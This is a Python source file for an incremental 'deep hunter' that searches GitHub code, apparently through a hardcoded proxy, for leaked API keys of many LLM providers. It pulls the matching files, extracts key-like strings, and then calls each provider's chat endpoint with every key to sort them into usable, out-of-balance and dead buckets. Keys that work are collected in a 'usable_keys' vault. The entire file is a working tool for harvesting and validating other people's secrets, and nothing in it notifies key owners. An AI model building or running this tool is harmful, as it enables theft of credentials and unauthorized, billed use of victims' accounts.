459 lines
19 KiB
Python
459 lines
19 KiB
Python
#!/usr/bin/env python3
|
|
"""Unified deep hunter across all LLM providers — INCREMENTAL.
|
|
|
|
Only fetches/verifies NEW candidates:
|
|
* GitHub file URLs already seen (any results/*/candidates.tsv) are skipped.
|
|
* Keys already in the vault, any bucket file, or the verify cache are skipped.
|
|
* Already-crawled blobs are served from results/_cache/content (477MB warm).
|
|
|
|
Run: python3 hunt_all_deep.py --search # gather new candidate files
|
|
python3 hunt_all_deep.py --verify # harvest + verify only new keys
|
|
python3 hunt_all_deep.py --providers minimax,deepseek # subset
|
|
"""
|
|
import argparse, json, os, re, sys, time, urllib.parse, urllib.request, urllib.error
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
|
from verify_cache import CachedVerifier
|
|
from content_cache import ContentCache
|
|
import providers_all_deep as P
|
|
|
|
HERE = Path(__file__).resolve().parent
|
|
RESULTS = HERE / "results" / "all_deep"
|
|
RESULTS.mkdir(parents=True, exist_ok=True)
|
|
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
TOKEN = (os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
|
or os.popen("gh auth token 2>/dev/null").read().strip())
|
|
GH_OPENER = (urllib.request.build_opener(
|
|
urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}))
|
|
if GH_PROXY else urllib.request.build_opener())
|
|
DIRECT = urllib.request.build_opener()
|
|
UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
|
|
"Chrome/124.0 Safari/537.36")
|
|
|
|
|
|
def http(base, path, key, body=None, method=None, timeout=30, extra=None):
|
|
url = base + path
|
|
headers = {"Authorization": "Bearer " + key, "User-Agent": UA,
|
|
"Accept": "application/json, */*"}
|
|
data = None
|
|
if body is not None:
|
|
data = json.dumps(body).encode(); headers["Content-Type"] = "application/json"
|
|
if extra:
|
|
headers.update(extra)
|
|
req = urllib.request.Request(url, data=data, headers=headers,
|
|
method=method or ("POST" if body is not None else "GET"))
|
|
try:
|
|
with DIRECT.open(req, timeout=timeout) as r:
|
|
return r.getcode(), r.read().decode("utf-8", "replace")
|
|
except urllib.error.HTTPError as e:
|
|
try:
|
|
return e.code, e.read().decode("utf-8", "replace")
|
|
except Exception:
|
|
return e.code, ""
|
|
except Exception as e:
|
|
return 0, f"net:{type(e).__name__}"
|
|
|
|
|
|
def msg_of(body):
|
|
try:
|
|
j = json.loads(body)
|
|
err = j.get("error") if isinstance(j, dict) else None
|
|
if isinstance(err, dict):
|
|
# combine code + message so balance codes get caught
|
|
parts = [str(err.get("message", "")), str(err.get("code", "")),
|
|
str(err.get("type", ""))]
|
|
return " ".join(p for p in parts if p and p != "None")[:200]
|
|
if isinstance(err, str):
|
|
return err[:200]
|
|
if isinstance(j, dict):
|
|
return str(j.get("message", j.get("msg", "")))[:200]
|
|
except Exception:
|
|
pass
|
|
return (body or "")[:200]
|
|
|
|
|
|
def openai_verify(base, path, models, extra_headers=None):
|
|
def v(key):
|
|
last = "no model"
|
|
for model in models:
|
|
code, body = http(base, path, key,
|
|
{"model": model,
|
|
"messages": [{"role": "user", "content": "reply ok"}],
|
|
"max_tokens": 16, "temperature": 0.01},
|
|
extra=extra_headers)
|
|
verdict, detail = classify_openai(code, body)
|
|
if verdict in ("USABLE", "DEAD", "NO_BALANCE"):
|
|
return verdict, f"{model} {detail}"
|
|
last = f"{model} {detail}"
|
|
return "UNKNOWN", last
|
|
return v
|
|
|
|
|
|
def classify_openai(code, body):
|
|
if code == 200:
|
|
try:
|
|
j = json.loads(body)
|
|
except Exception:
|
|
return "UNKNOWN", "200 non-json"
|
|
if j.get("choices"):
|
|
return "USABLE", "200 choices"
|
|
br = j.get("base_resp") or {}
|
|
bc = br.get("status_code")
|
|
if bc is not None:
|
|
return classify_minimax_code(bc, br.get("status_msg", ""))
|
|
ec = j.get("error") or {}
|
|
if isinstance(ec, dict) and ec.get("code"):
|
|
return classify_native_code(ec.get("code"), ec.get("message", ""))
|
|
return "UNKNOWN", "200 no choices"
|
|
if code == 401:
|
|
return "DEAD", f"401 {msg_of(body)}"
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"{code} {msg_of(body)}"
|
|
if code == 400:
|
|
m = msg_of(body).lower()
|
|
if any(w in m for w in ("invalid", "unauthor", "api key", "authentication",
|
|
"incorrect", "does not exist")):
|
|
return "DEAD", f"400 {msg_of(body)}"
|
|
if any(w in m for w in ("balance", "quota", "insufficient", "limit",
|
|
"payment", "arrears", "exhaust", "credit")):
|
|
return "NO_BALANCE", f"400 {msg_of(body)}"
|
|
return "NO_ACCESS", f"400 {msg_of(body)}"
|
|
if code in (403, 404, 422, 451):
|
|
m = msg_of(body).lower()
|
|
# 401-style invalid-key messages can arrive as 403/400 on some gateways
|
|
if any(w in m for w in ("invalid_api_key", "invalid api key",
|
|
"incorrect api key", "invalid key",
|
|
"authentication", "鉴权不通过", "无效的令牌",
|
|
"apikey not found", "bad forward key",
|
|
"invalid_credentials", "not authorized",
|
|
"not_authorized", "forbidden. you have no")):
|
|
# balance-keyed forbidden must win first
|
|
pass
|
|
if any(w in m for w in ("insufficient_balance", "balance", "quota",
|
|
"额度不足", "余额不足", "账户余额", "可用余额",
|
|
"arrears", "exhaust", "credit",
|
|
"insufficient balance", "用户额度")):
|
|
return "NO_BALANCE", f"{code} {msg_of(body)}"
|
|
if any(w in m for w in ("invalid_api_key", "invalid api key",
|
|
"incorrect api key", "invalid key",
|
|
"authentication", "鉴权不通过", "无效的令牌",
|
|
"apikey not found", "bad forward key",
|
|
"invalid_credentials", "not_authorized",
|
|
"not authorized error", "no permission")):
|
|
return "DEAD", f"{code} {msg_of(body)}"
|
|
return "NO_ACCESS", f"{code} {msg_of(body)}"
|
|
if code in (500, 502, 503, 520, 524, 0):
|
|
return "UNKNOWN", f"{code} {msg_of(body)}"
|
|
return "NO_ACCESS", f"{code} {msg_of(body)}"
|
|
|
|
|
|
def classify_minimax_code(bc, m=""):
|
|
if bc == 0:
|
|
return "USABLE", "200 choices"
|
|
if bc in (1001, 1003, 1004, 1014, 1111, 2049):
|
|
return "DEAD", f"{bc} {m}"
|
|
if bc == 2056:
|
|
return "NO_BALANCE", f"{bc} token plan capped"
|
|
if bc in (1002, 1008, 1013, 1026, 1038, 1045, 1063, 1064, 1082):
|
|
return "NO_BALANCE", f"{bc} {m}"
|
|
return "NO_ACCESS", f"{bc} {m}"
|
|
|
|
|
|
def classify_native_code(code, m=""):
|
|
cs = str(code)
|
|
if cs in ("1113",):
|
|
return "NO_BALANCE", f"{cs} no balance/resource"
|
|
if cs in ("1310", "1313", "1305", "1302"):
|
|
return "NO_BALANCE", f"{cs} rate/cap"
|
|
return "NO_ACCESS", f"{cs} {m}"
|
|
|
|
|
|
def google_verify(key):
|
|
"""Google Gemini uses a non-OpenAI endpoint; API key in query string."""
|
|
url = (f"https://generativelanguage.googleapis.com/v1beta/models/"
|
|
f"gemini-1.5-flash:generateContent?key={key}")
|
|
body = json.dumps({"contents": [{"parts": [{"text": "reply ok"}]}],
|
|
"generationConfig": {"maxOutputTokens": 16}}).encode()
|
|
req = urllib.request.Request(url, data=body,
|
|
headers={"Content-Type": "application/json",
|
|
"User-Agent": UA})
|
|
try:
|
|
with DIRECT.open(req, timeout=30) as r:
|
|
d = json.loads(r.read())
|
|
if d.get("candidates"):
|
|
return "USABLE", "gemini-1.5-flash 200 candidates"
|
|
return "NO_ACCESS", f"200 {str(d)[:100]}"
|
|
except urllib.error.HTTPError as e:
|
|
b = e.read().decode("utf-8", "replace")
|
|
if e.code == 400 and "API_KEY_INVALID" in b:
|
|
return "DEAD", f"400 API_KEY_INVALID"
|
|
if e.code == 403 or e.code == 429:
|
|
return "NO_BALANCE", f"{e.code} {msg_of(b)}"
|
|
if e.code == 401:
|
|
return "DEAD", f"401 {msg_of(b)}"
|
|
return "NO_ACCESS", f"{e.code} {msg_of(b)}"
|
|
except Exception as e:
|
|
return "UNKNOWN", f"net:{type(e).__name__}"
|
|
|
|
|
|
# ── Dedup: gather ALL previously seen URLs & keys ───────────────
|
|
def load_seen():
|
|
seen_urls = set()
|
|
seen_keys = set()
|
|
# 1) every candidates.tsv anywhere under results/
|
|
for p in HERE.glob("results/**/candidates.tsv"):
|
|
try:
|
|
for ln in p.read_text(errors="replace").splitlines():
|
|
parts = ln.split("\t")
|
|
if len(parts) >= 3:
|
|
seen_urls.add(parts[2].strip())
|
|
if len(parts) >= 4:
|
|
seen_keys.add(parts[3].strip())
|
|
except Exception:
|
|
pass
|
|
# 2) every bucket .txt (key is first field, tab or pipe separated)
|
|
for p in HERE.glob("results/**/*.txt"):
|
|
if p.name in ("candidates.tsv",):
|
|
continue
|
|
try:
|
|
for ln in p.read_text(errors="replace").splitlines():
|
|
line = ln.strip()
|
|
if not line:
|
|
continue
|
|
k = re.split(r"[\t|]", line, maxsplit=1)[0].strip()
|
|
if k and (k.startswith("sk-") or k.startswith("gsk_")
|
|
or k.startswith("ak_") or k.startswith("sk-ant")
|
|
or k.startswith("AIza") or "." in k or "-" in k):
|
|
seen_keys.add(k)
|
|
except Exception:
|
|
pass
|
|
# 3) vault keys
|
|
for p in HERE.glob("usable_keys/*/keys.json"):
|
|
try:
|
|
d = json.loads(p.read_text())
|
|
d = d if isinstance(d, list) else [d]
|
|
for e in d:
|
|
if isinstance(e, dict) and e.get("key"):
|
|
seen_keys.add(e["key"].strip())
|
|
except Exception:
|
|
pass
|
|
# 4) verify cache keys
|
|
for p in HERE.glob("results/_cache/*.json"):
|
|
try:
|
|
d = json.loads(p.read_text())
|
|
if isinstance(d, dict):
|
|
seen_keys.update(k for k in d.keys())
|
|
except Exception:
|
|
pass
|
|
# 5) keys.env
|
|
for p in HERE.glob("usable_keys/*/keys.env"):
|
|
try:
|
|
for ln in p.read_text(errors="replace").splitlines():
|
|
if "=" in ln:
|
|
seen_keys.add(ln.split("=", 1)[1].strip())
|
|
except Exception:
|
|
pass
|
|
return seen_urls, seen_keys
|
|
|
|
|
|
def gh_code_search(query, max_results=100):
|
|
out = []
|
|
for page in range(1, 4):
|
|
url = ("https://api.github.com/search/code?"
|
|
+ urllib.parse.urlencode({"q": query, "per_page": 100, "page": page}))
|
|
req = urllib.request.Request(url, headers={
|
|
"Authorization": "token " + TOKEN,
|
|
"Accept": "application/vnd.github+json",
|
|
"User-Agent": "all-deep-hunter/1.0"})
|
|
try:
|
|
with GH_OPENER.open(req, timeout=30) as r:
|
|
data = json.loads(r.read())
|
|
except urllib.error.HTTPError as e:
|
|
if e.code in (403, 429):
|
|
reset = e.headers.get("X-RateLimit-Reset")
|
|
wait = min(max(int(reset) - int(time.time()) + 2, 2), 120) if reset else 30
|
|
time.sleep(wait); continue
|
|
if e.code == 422:
|
|
break
|
|
time.sleep(5); continue
|
|
except Exception:
|
|
time.sleep(5); continue
|
|
items = data.get("items", [])
|
|
for it in items:
|
|
out.append((it["repository"]["full_name"], it["path"], it["html_url"]))
|
|
if len(items) < 100:
|
|
break
|
|
time.sleep(6.5)
|
|
return out[:max_results]
|
|
|
|
|
|
def fetch_raw_cached(repo, path, url, cc):
|
|
# URL form .../blob/<sha>/<path> -> key cache on immutable sha
|
|
m = re.search(r"/blob/([0-9a-f]{40})/", url)
|
|
sha = m.group(1) if m else ""
|
|
if sha:
|
|
hit = cc.get(repo.lower(), path, sha)
|
|
if hit is not None:
|
|
return hit
|
|
txt = ""
|
|
for ref in ("HEAD", "main", "master"):
|
|
u = f"https://raw.githubusercontent.com/{repo}/{ref}/{path}"
|
|
req = urllib.request.Request(u, headers={"User-Agent": UA})
|
|
try:
|
|
with GH_OPENER.open(req, timeout=25) as r:
|
|
txt = r.read().decode("utf-8", "replace")
|
|
break
|
|
except urllib.error.HTTPError as e:
|
|
if e.code == 404:
|
|
continue
|
|
break
|
|
except Exception:
|
|
continue
|
|
if txt and sha:
|
|
cc.put(repo.lower(), path, sha, txt)
|
|
return txt
|
|
|
|
|
|
def harvest(text, patterns, context, fakes):
|
|
if not text:
|
|
return set()
|
|
low = text.lower()
|
|
has_ctx = any(c in low for c in context) if context else True
|
|
found = set()
|
|
for rx in patterns:
|
|
for m in rx.finditer(text):
|
|
k = m.group(0).rstrip("'\"`,;)]")
|
|
kl = k.lower()
|
|
if any(f in kl for f in fakes):
|
|
continue
|
|
if context and not k.startswith(("sk-cp-", "sk-ant", "gsk_",
|
|
"ak_", "sk-or-v1-", "AIza")):
|
|
lo = max(0, m.start() - 100); hi = min(len(low), m.end() + 100)
|
|
if not any(c in low[lo:hi] for c in context):
|
|
continue
|
|
if not has_ctx and context:
|
|
continue
|
|
found.add(k)
|
|
return found
|
|
|
|
|
|
def main():
|
|
ap = argparse.ArgumentParser()
|
|
ap.add_argument("--search", action="store_true")
|
|
ap.add_argument("--verify", action="store_true")
|
|
ap.add_argument("--providers", default="", help="comma list, default all")
|
|
ap.add_argument("--workers", type=int, default=24)
|
|
args = ap.parse_args()
|
|
|
|
specs = P.build(openai_verify)
|
|
# google has a custom verifier
|
|
if "google" in specs:
|
|
specs["google"]["verify"] = google_verify
|
|
# patterns may be raw strings in the registry; compile once here.
|
|
for s in specs.values():
|
|
s["patterns"] = [re.compile(p) for p in s["patterns"]]
|
|
if args.providers:
|
|
want = set(args.providers.split(","))
|
|
specs = {k: v for k, v in specs.items() if k in want}
|
|
|
|
cand = RESULTS / "candidates.tsv"
|
|
seen_urls, seen_keys = load_seen()
|
|
print(f"dedup baseline: {len(seen_urls)} known URLs, {len(seen_keys)} known keys", flush=True)
|
|
|
|
if args.search:
|
|
new_urls = 0
|
|
for name, spec in specs.items():
|
|
for q in spec["queries"]:
|
|
res = gh_code_search(q)
|
|
added = 0
|
|
with cand.open("a") as f:
|
|
for repo, path, url in res:
|
|
if url in seen_urls:
|
|
continue
|
|
seen_urls.add(url)
|
|
f.write(f"{name}\t{repo}\t{path}\t{url}\n")
|
|
added += 1; new_urls += 1
|
|
print(f" [{name:16}] {q[:42]:42} {len(res):3} hits, {added:3} new", flush=True)
|
|
time.sleep(2)
|
|
print(f"search done: {new_urls} new candidate files -> {cand}", flush=True)
|
|
|
|
if args.verify:
|
|
if not cand.exists():
|
|
print("no candidates.tsv (run --search first)"); return
|
|
rows = [ln.rstrip("\n").split("\t") for ln in cand.read_text().splitlines() if ln.strip()]
|
|
print(f"harvesting {len(rows)} candidate files...", flush=True)
|
|
cc = ContentCache()
|
|
# provider -> {key: source}
|
|
new_keys = {name: {} for name in specs}
|
|
valid = [(row[0], row[1], row[2], row[3]) for row in rows
|
|
if len(row) >= 4 and row[0] in specs]
|
|
done_n = 0
|
|
harvest_workers = min(48, args.workers * 2)
|
|
print(f" fetching {len(valid)} files with {harvest_workers} workers...", flush=True)
|
|
|
|
def fetch_one(item):
|
|
prov, repo, path, url = item
|
|
spec = specs[prov]
|
|
try:
|
|
txt = fetch_raw_cached(repo, path, url, cc)
|
|
except Exception:
|
|
txt = ""
|
|
found = set()
|
|
for k in harvest(txt, spec["patterns"], spec["context"], spec["fakes"]):
|
|
if k not in seen_keys:
|
|
found.add(k)
|
|
return prov, url, found
|
|
|
|
with ThreadPoolExecutor(max_workers=harvest_workers) as ex:
|
|
for prov, url, found in ex.map(fetch_one, valid):
|
|
done_n += 1
|
|
for k in found:
|
|
new_keys[prov].setdefault(k, url)
|
|
if done_n % 100 == 0:
|
|
tot = sum(len(v) for v in new_keys.values())
|
|
print(f" {done_n}/{len(valid)} new_keys={tot}", flush=True)
|
|
cc.save()
|
|
total = sum(len(v) for v in new_keys.values())
|
|
print(f"harvest done: {total} NEW candidate keys across all providers", flush=True)
|
|
for name in new_keys:
|
|
if new_keys[name]:
|
|
print(f" {name:16}: {len(new_keys[name])} new", flush=True)
|
|
|
|
buckets = {k: [] for k in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD")}
|
|
for name, spec in specs.items():
|
|
keys = new_keys.get(name, {})
|
|
if not keys:
|
|
continue
|
|
print(f"\n=== verifying {name}: {len(keys)} new keys ===", flush=True)
|
|
with CachedVerifier(f"alldeep_{name}", spec["verify"]) as ver:
|
|
with ThreadPoolExecutor(max_workers=args.workers) as ex:
|
|
futs = {ex.submit(ver, k): (k, s) for k, s in keys.items()}
|
|
done = 0
|
|
for f in as_completed(futs):
|
|
k, s = futs[f]; done += 1
|
|
try:
|
|
v, d = f.result()
|
|
except Exception as e:
|
|
v, d = "UNKNOWN", f"exc:{e}"
|
|
buckets[v].append((name, k, s, d))
|
|
if done % 25 == 0:
|
|
print(f" {name} {done}/{len(keys)}", flush=True)
|
|
|
|
for label in buckets:
|
|
with (RESULTS / f"{label.lower()}.txt").open("w") as f:
|
|
for prov, k, s, d in buckets[label]:
|
|
f.write(f"{prov}\t{k}\t{s}\t{d}\n")
|
|
print("\n=== FINAL (NEW keys only) ===")
|
|
for label in buckets:
|
|
print(f" {label:11}: {len(buckets[label])}")
|
|
for prov, k, s, d in buckets["USABLE"]:
|
|
print(f" ✅ [{prov}] {k[:50]} {d}")
|
|
print(f" {s}")
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|